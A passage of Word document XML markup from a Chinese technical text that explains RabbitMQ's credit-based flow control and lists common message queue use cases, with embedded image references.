          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值，以进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为例，｛｛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>credit_from, C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>｝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, Value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>｝，表示能发多少条消息给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，每发一条</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>消息该值减</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，当为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，本进程阻塞住不再往下游进程发消息也不再接收上游的消息；｛｛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>credit_to, A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>｝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, Value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>｝表示再接收多少个消息就向上游进程发增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>credit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值的消息｛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bump_credit, { self(), Quantity}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>｝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在上游进程接收到该消息后，就增加｛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>credit_from, pid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>｝值，这样上游进程就能持续发消息。但当上游发送速率高于下游接收速率，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>credit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值会逐渐被耗光这时进程就会被阻塞，阻塞的情况会一直传递到最上游</w:t>
      </w:r>
      <w:r w:rsidR="00637137">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Rabbit_reader</w:t>
      </w:r>
      <w:r w:rsidR="00637137">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，这时</w:t>
      </w:r>
      <w:r w:rsidR="00637137">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rabbit_reader</w:t>
      </w:r>
      <w:r w:rsidR="00637137">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就关闭闸门。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRPr="00637137" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、何时开启闸门</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00821E21" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当上游进程收到来自下游进程的</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bump_credit</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>消息时，若此时上游进程处于</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>状态则解除</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>状态，开始接收更上游进程的消息，一个个的传导最终能够解除</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rabbit_reader</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidR="00313CF7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00B90A35">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息队列应用场景</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>短信发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>日志记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>邮件发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通知服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4169410" cy="2523490"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="275" name="图片 4" descr="java消息队列使用场景 - 私人频道 - 金色年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java消息队列使用场景 - 私人频道 - 金色年华"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId315" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4169410" cy="2523490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3942715" cy="2552700"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="276" name="图片 7" descr="java消息队列使用场景 - 私人频道 - 金色年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java消息队列使用场景 - 私人频道 - 金色年华"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId316" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3942715" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4001135" cy="2640965"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="277" name="图片 10" descr="java消息队列使用场景 - 私人频道 - 金色年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java消息队列使用场景 - 私人频道 - 金色年华"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId317" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4001135" cy="2640965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90A35" w:rsidRDefault="00B90A35" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
